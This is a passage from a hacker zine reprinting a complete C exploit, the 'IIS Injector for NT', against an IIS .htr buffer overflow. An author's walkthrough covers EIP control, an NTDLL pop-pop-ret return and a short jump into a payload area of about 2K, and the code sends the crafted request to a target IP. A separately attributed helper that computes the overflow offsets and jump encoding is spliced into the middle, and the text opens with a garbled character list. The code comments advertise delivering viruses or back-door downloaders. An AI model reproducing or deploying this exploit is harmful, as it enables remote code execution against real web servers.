c7=a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,0,1,2,3,4,5,6,7,8,9,-,_, c8=a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,0,1,2,3,4,5,6,7,8,9,-,_, c9=a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,0,1,2,3,4,5,6,7,8,9,-,_, e0=a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,0,1,2,3,4,5,6,7,8,9,-,_, e1=a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,0,1,2,3,4,5,6,7,8,9,-,_, e2=a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,0,1,2,3,4,5,6,7,8,9,-,_, ------------------------------ 4.04 --=\\iss_injector.c.txt\\=-- I read yesturday on eEye.com that they had discovered a buffer overflow in IIS. I could not resist writing an exploit. I did not have time to design a really cool payload for this exploit, so I simply wrote the injection code. However, this is meaningful for several reasons. Attached is the injection code. The exploit will deliver any payload of your choosing. Your payload will be executed. This empowers you to create a "collection" of payloads that are not dependant upon the injection vector in any way. This decoupling is important for military needs, where a single injection vector needs to work, but the "warhead" may be different depending on the targets characterization. The exploit was fairly simple to build. In short, I read on eEye.com that they had overflowed IIS with something like a ~3000 character URL. Within minutes I had caused IIS to crash with EIP under my control. I used a special pattern in the buffer (see code) to make it easy for me to identify where EIP was being popped from. The pattern also made it easy to determine where I was jumping around. Use the tekneek Danielson. ;-) So, I controlled EIP, but I needed to get back to my stack segment, of course. This is old school, and I really lucked out. Pushed down two levels on the stack was an address for my buffer. I couldn't have asked for more. So, I found a location in NTDLL.DLL (0x77F88CF0) that I could return to. It had two pop's followed by a return. 
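The offset bookkeeping behind that walkthrough, as an added example (my code, not Hoglund's, and not part of the original article): it rebuilds the same 4-byte pattern the injector fills its buffer with, maps the crash value 0x47744847 ("GHtG" read little-endian) back to the buffer offset 598 that EIP was popped from, and computes the rel8 operand for the short jmp that sits at offset 595 and has to hop over the embedded return address to land on the payload at 650. The crash value and the offsets 595, 598 and 650 are taken from the injector source; the function names are mine.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define PATTERN_LEN 4096

/* Same rule as the injector: quad i is {kick, place, place+1, place+2};
 * place walks 'A'..'X' and kick steps down from 'z' each time place wraps.
 * Kick changes every 24 quads, so every 4-byte window in the first 2496
 * bytes is unique; after kick sticks at 'a' the pattern repeats every 96. */
void build_pattern(char *buf, size_t len)
{
    char kick = 'z', place = 'A';
    for (size_t i = 0; i + 3 < len; i += 4) {
        buf[i]     = kick;
        buf[i + 1] = place;
        buf[i + 2] = place + 1;
        buf[i + 3] = place + 2;
        if (++place == 'Y') {
            place = 'A';
            if (--kick < 'a')
                kick = 'a';
        }
    }
}

/* Map a faulting EIP back to a buffer offset. The value is what the debugger
 * shows as a 32-bit register, so its bytes are reversed (little-endian)
 * before searching. Returns the first matching offset, or -1. */
long find_offset(const char *buf, size_t len, uint32_t eip)
{
    char needle[4] = {
        (char)(eip & 0xff), (char)((eip >> 8) & 0xff),
        (char)((eip >> 16) & 0xff), (char)((eip >> 24) & 0xff)
    };
    for (size_t i = 0; i + 4 <= len; i++)
        if (memcmp(buf + i, needle, 4) == 0)
            return (long)i;
    return -1;
}

/* rel8 operand for a short jmp (EB xx) placed at jmp_at, landing on target.
 * The displacement counts from the end of the 2-byte instruction.
 * Returns -1 if target is outside the signed 8-bit reach. */
int short_jmp_rel8(size_t jmp_at, size_t target)
{
    long d = (long)target - (long)(jmp_at + 2);
    if (d < -128 || d > 127)
        return -1;
    return (int)(d & 0xff);
}

/* The injector's own numbers: crash EIP 0x47744847 resolves to offset 598. */
long injector_eip_offset(void)
{
    static char pat[PATTERN_LEN];
    build_pattern(pat, PATTERN_LEN);
    return find_offset(pat, PATTERN_LEN, 0x47744847u);
}

int main(void)
{
    long off = injector_eip_offset();
    printf("return address is popped from buffer offset %ld\n", off);
    printf("jmp short at 595 -> 650 encodes as EB %02X\n", short_jmp_rel8(595, 650));
    return off == 598 ? 0 : 1;
}
```

It needs no IIS to run. find_offset() works for any crash value copied from the debugger while the pattern is on the stack, as long as the hit lies in the first 2496 bytes; past that the kick byte no longer changes and a window can match more than once, so the first match is reported and has to be confirmed by hand.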
This made my injection vector return to the value that was stored two layers down on the stack. Bam, I was in my buffer. So, I landed in a weird place, had to add a near jump to get to somewhere more useful.. nothing special, and here we are with about 2K of payload space.

If you don't supply any mobile code to be run, the injection vector will supply some for you. The default payload is simply a couple of no-ops followed by a debug breakpoint (interrupt 3)... It's easy to play with if you want to build your own payloads.. just keep a debugger attached to inetinfo.exe on the target machine.

Lastly, I would simply like to point out that monoculture installations are very dangerous. It's a concept from agribusiness.. if you have all one crop, and a virus comes along that can kill that crop, you're out of business. With almost ALL of the IIS servers on the net being vulnerable to this exploit, we also have a monoculture. And, it's not just IIS. The backbone of the Internet is built on common router technology (such as Cisco IOS). If a serious exploit comes along for the IOS kernel, can you imagine the darkness that will fall?

<--- snip

// IIS Injector for NT
// written by Greg Hoglund
// http://www.rootkit.com
//
// If you would like to deliver a payload, it must be stored in a binary file.
// This injector decouples the payload from the injection code allowing you to
// create a number of different attack payloads. This code could be used, for
// example, by a military that needs to attack IIS servers, and has characterized
// the eligible hosts. The proper attack can be chosen depending on needs. Since
// the payload is so large with this injection vector, many options are available.
// First and foremost, virii can be delivered with ease. The payload is also plenty
// large enough to remotely download and install a back door program.
// Considering the monoculture of NT IIS servers out on the 'Net, this represents a
// very serious security problem.
#include <winsock2.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char **argv)
{
    SOCKET s = 0;
    WSADATA wsaData;

    if(argc < 2)
    {
        fprintf(stderr, "IIS Injector for NT\nwritten by Greg Hoglund, " \
                "http://www.rootkit.com\nUsage: %s <target ip> [payload file]\n", argv[0]);
        exit(0);
    }

    WSAStartup(MAKEWORD(2,0), &wsaData);
    s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if(INVALID_SOCKET != s)
    {
        SOCKADDR_IN anAddr;
        anAddr.sin_family = AF_INET;
        anAddr.sin_port = htons(80);
        anAddr.sin_addr.S_un.S_addr = inet_addr(argv[1]);

        if(0 == connect(s, (struct sockaddr *)&anAddr, sizeof(struct sockaddr)))
        {
            static char theSploit[4096];

            // fill pattern
            char kick = 'z';  //0x7a
            char place = 'A';

            // my uber sweet pattern gener@t0r
            // every quad is {kick, place, place+1, place+2}; place walks 'A'..'X'
            // and kick drops one letter each time place wraps, so whatever four
            // bytes show up in EIP point back to exactly one buffer offset
            for(int i=0;i<4096;i+=4)
            {
                theSploit[i]   = kick;
                theSploit[i+1] = place;
                theSploit[i+2] = place + 1;
                theSploit[i+3] = place + 2;

                if(++place == 'Y') // beyond 'XYZ'
                {
                    place = 'A';
                    if(--kick < 'a') kick = 'a';
                }
            }

            // MSVC _snprintf does not NUL-terminate when the output exactly fills
            // the count, so "get /" overwrites the pattern without cutting the
            // request short; a C99 snprintf would drop the '/' and add a NUL here
            _snprintf(theSploit, 5, "get /");
            _snprintf(theSploit + 3005, 22, "BBBB.htr HTTP/1.0\r\n\r\n\0");

            // after crash, looks like inetinfo.exe is jumping to the address
            // stored @ location 'GHtG' (0x47744847)
            // cross reference back to the buffer pattern, looks like we need
            // to store our EIP into theSploit[598]

            // magic eip into NTDLL.DLL (0x77F88CF0: pop, pop, ret)
            theSploit[598] = (char)0xF0;
            theSploit[599] = (char)0x8C;
            theSploit[600] = (char)0xF8;
            theSploit[601] = (char)0x77;

            // code I want to execute
            // will jump forward over the
            // embedded eip, taking us
            // directly to the payload
            theSploit[594] = (char)0x90; //nop
            theSploit[595] = (char)0xEB; //jmp short
            theSploit[596] = (char)0x35; //  +0x35 from 597 lands on 650, the payload
            theSploit[597] = (char)0x90; //nop

            // the payload. This code is executed remotely.
            // if no payload is supplied on the command line, then this default
            // payload is used. int 3 is the debug interrupt and
            // will cause your debugger to "breakpoint" gracefully.
            // upon examination you will find that you are sitting
            // directly in this code-payload.
            if(argc < 3)
            {
                theSploit[650] = (char) 0x90; //nop
                theSploit[651] = (char) 0x90; //nop
                theSploit[652] = (char) 0x90; //nop
                theSploit[653] = (char) 0x90; //nop
                theSploit[654] = (char) 0xCC; //int 3
                theSploit[655] = (char) 0xCC; //int 3
                theSploit[656] = (char) 0xCC; //int 3
                theSploit[657] = (char) 0xCC; //int 3
                theSploit[658] = (char) 0x90; //nop
                theSploit[659] = (char) 0x90; //nop
                theSploit[660] = (char) 0x90; //nop
                theSploit[661] = (char) 0x90; //nop
            }
            else
            {
                // send the user-supplied payload from
                // a file. Yes, that's a 2K buffer for
                // mobile code. Yes, that's big.
                FILE *in_file = fopen(argv[2], "rb");
                if(in_file)
                {
                    int offset = 650;
                    int c;
                    // stop on the EOF return itself; testing feof() first would
                    // store one bogus 0xFF byte after the last real one
                    while(offset < 3000 && (c = fgetc(in_file)) != EOF)
                    {
                        theSploit[offset++] = (char)c;
                    }
                    fclose(in_file);
                }
            }

            // strlen() stops at the first NUL, so a payload containing 0x00
            // would truncate everything after it, including the ".htr" tail
            // that makes ISM.DLL handle the request at all
            send(s, theSploit, strlen(theSploit), 0);
        }
        closesocket(s);
    }
    WSACleanup();
    return 0;
}

------------------------------

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
.  Quote #3-                                                 .
.                                                            .
.  "Hey anyone need an easy way to make $50?"                .
.                                                   -JayPee  .
.                                                            .
.  Quote made up by Lord Oak.                                .
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Please go to: www.thepoison.org/popup.html and click on our sponsors because we have to pay the bills someway! It doesn't cost you anything (except 10 seconds) to go there and click on it.

Antidote is an HNN Affiliate
http://www.hackernews.com

All ASCII art in this issue is done by Lord Oak [lordoak@thepoison.prg] and permission is needed before using.